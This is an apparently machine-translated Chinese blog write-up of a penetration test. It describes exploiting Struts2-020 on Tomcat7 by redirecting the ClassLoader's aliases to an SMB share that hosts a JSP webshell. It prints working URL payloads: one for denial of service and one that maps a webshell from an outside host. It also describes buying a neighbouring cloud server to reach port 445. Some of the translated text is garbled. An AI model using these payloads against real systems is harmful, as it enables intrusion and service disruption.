Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how Struts2-020s exist in Tomcat7 in the cloud environment. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

In a simulated attack on Party A, it was found that there was Struts2-020on a website, but the middleware tomcat7 could not getshell directly.

First, the principle of Struts2-020 vulnerability.

Object is the basic class of java, and all objects generated by class will inherit all the properties and methods of Object, so no matter what the current action code is, there must be a getClass method that comes with Object, which will return a Class object, and the Class object must have getClassLoader methods, and eventually class can be manipulated in each action. Struts2-020 allows access to the "class" parameter that maps directly to the "getClass ()" method, which can be used to manipulate the ClassLoader of the application server being used. In short, some configuration properties of Tomcat can be manipulated through ClassLoader, and this vulnerability can be getshell under Tomcat8. The following figure shows some of the controllable properties of tomcat8.

Tomcat8 how to getshell a lot of online will not be demonstrated here, the general steps are as follows

1. Change Tomcat log to executable file, change log file name, change log path to web directory

two。 Initialize log file

3. Write a sentence to the log via URL access

4. Kitchen knife connected with a sentence successful getshell

Second, how does Tomcat7 getshell?

At first, I thought that struts2-010could be getshell under tomcat, but failed under crazy operation. Baidu only knew that tomcat7 could not control log attributes. Only redirecting the web directory can cause a denial of service attack.

Denial of service attack:

Http://127.0.0.1/s/example/HelloWorld.action? Class.classLoader.resources.dirContext.docBase= "just fill it in"

But only dig a denial of service attack can not hand over to Party A, Party A can not hand in the job, the boss is not happy, the boss is not happy, my performance appraisal is in danger. The denial of service attack is even more afraid to fight. The last simulation attack paralyzed Party A's service, and the last outsourcing also left me.

2.1 Local boring debugging

In desperation, we can only enumerate all the controllable properties in the local build environment.

Try each attribute to see if it can be used. After simply changing the attribute value one by one, through the log and changes to judge, I found that I could not getshell. When I was about to give up, a red figure floated through my mind and kindly told me that there was no unbreakable system, only hackers who did not work hard. Full of fighting spirit in an instant!

2.2 Google Dafa is good

Google, as a good friend of technicians, is right when it comes to technical problems. After a search, Google wrote in an article written by Lao Mao that class.classLoader.parent.resources.dirContext.aliases can not only read arbitrary files, but that the file path supports UNC path, that is, smb path. At this point, I thought that since the SMB path is supported, I can execute commands when I get a file share? As long as the file sharing is set to eve and anyone can access it, the website can read the executable file, maybe it can be executed!

2.3 build SMB services locally and test

It is not difficult to build the process, put a word Trojan in the file sharing, and then map the alias path of the website to the SMB server.

Payload:

Http://127.0.0.1:8080/struts2-blank/hello.action? Class.classLoader.parent.resources.dirContext.aliases=\\ 192.168.1.1\ muma.jsp

A series of kitchen knives successfully connected:

III. Cloud environment testing

Because the goal is in the cloud environment, it is well known that most cloud environments do not open port 445 to the public. However, through information collection, it is found that the target is in a pheasant cloud environment, because I have previously contacted several pheasant cloud server manufacturers, and their port 445 in segment C is interoperable. I wonder if this manufacturer also has such a configuration loophole?

3.1 the power of money

I originally wanted to remove a server as a SMB server in paragraph C, but as a white hat of justice, how could I do such a nasty thing? We can only put forward the plan and submit it to the superior for funding. Finally, on the grounds of an IP number next to the target IP, the customer service bought the server adjacent to the target at 1.5 times the price, and finally found that there was indeed a misconfiguration. The port 445 of segment C can be accessed to each other so that the Getshell is successful.

Site penetration is rarely a POC or EXP directly through, encounter problems more thinking, more search.

This is how the editor shares how Struts2-020s exist in Tomcat7 in the cloud environment. If you happen to have similar doubts, please refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.